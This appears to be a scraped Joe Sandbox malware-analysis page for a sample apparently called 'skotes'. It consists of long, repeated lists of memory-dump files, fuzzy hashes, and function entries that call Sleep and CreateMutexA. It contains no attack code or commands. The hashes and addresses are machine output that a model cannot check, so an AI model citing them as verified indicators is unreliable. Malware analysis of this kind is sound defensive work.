Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: a4f0a236acfe978a74d13d2ac2b623d3999481bbf4099adc5c15d7981a45700c
Instruction ID: e6412025afef37be64d439ea061db5414700c806c14cb9e44ec64a31b942ec07
Opcode Fuzzy Hash: a4f0a236acfe978a74d13d2ac2b623d3999481bbf4099adc5c15d7981a45700c
Instruction Fuzzy Hash: 91312731B052099BEB18DB78DC89BADB766EBC6318F24861DE014973D1C77A99808B53

Function 009CA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 4c1d7995ae80d4ee8085110e5a50bc9a0463942e3771e999050b675d8661d2e6
Instruction ID: c7601ed4c6773791a4f1aff6a2d4e644cbbda1384a16b98ec9c9f95cbcf4aec2
Opcode Fuzzy Hash: 4c1d7995ae80d4ee8085110e5a50bc9a0463942e3771e999050b675d8661d2e6
Instruction Fuzzy Hash: AB312831B052099BEB08DBB8DCCDFADB766ABC6318F24861DE014973D1C77A99808753

Function 009CA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 1dbc6c3b1a71ab151c858268450486ca0b0fb49a1f4c568e90ba3910a7a8791e
Instruction ID: 6efeb4a0fdbb2105cd12e514d3f50ce418ae76e7f052337eff73addad4499bf6
Opcode Fuzzy Hash: 1dbc6c3b1a71ab151c858268450486ca0b0fb49a1f4c568e90ba3910a7a8791e
Instruction Fuzzy Hash: D5313931B002099BEB0C9B78DC8DFADB666EBD5318F20861DE054973E5C77989808763

Function 009CA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 8cb7396250e2b83ebc6432c19f328d01a6b505b6153406db2de451fd7f3895fb
Instruction ID: 21fa7562c5c51b35e69865148024342771ff5ed2f0b259c29e27335fc85b8c88
Opcode Fuzzy Hash: 8cb7396250e2b83ebc6432c19f328d01a6b505b6153406db2de451fd7f3895fb
Instruction Fuzzy Hash: 41312831F002498BEB08DB78DC89F6DB766EBC5328F24861DE054973D1C73989818B23

Function 009CA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896959187.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896996938.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897038037.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897083058.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897122627.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897162195.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897203295.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897253695.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897310854.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897361850.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897418808.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897471791.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897530977.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897600288.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897654234.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897715066.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897770094.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897832360.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897884909.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897936449.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268897999755.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898060398.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898109275.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898159282.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898213725.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898265592.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898312614.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898353432.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898415769.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898461725.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898508422.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898553832.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898593564.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898634192.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898761257.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898803637.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898841581.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898878584.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898920908.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268898961666.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899007062.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899051195.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268899094290.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9c0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9de58178db13f7afdee663300fb8bc6a240bd766021bad9b8c3a0bab7f84bc13
Instruction ID: 2759ecc0d609aa7bad4f5228c66322c0c64d6ce9fecf7100680b2ff10e6d844f
Opcode Fuzzy Hash: 9de58178db13f7afdee663300fb8bc6a240bd766021bad9b8c3a0bab7f84bc13
Instruction Fuzzy Hash: 35310931F002099BEB18DB78DD89BADB766ABC1318F24861DE018972D1C77989808763

Function 009C9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 009CA963
CreateMutexA.KERNELBASE(00000000,00000000,00A23254), ref: 009CA981

Memory Dump Source

Source File: 00000002.00000002.268896179082.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true

Associated: 00000002.00000002.268896134967.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896179082.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896320819.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896357790.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896399330.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896696835.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896733177.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896793248.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896834758.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.268896872404.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
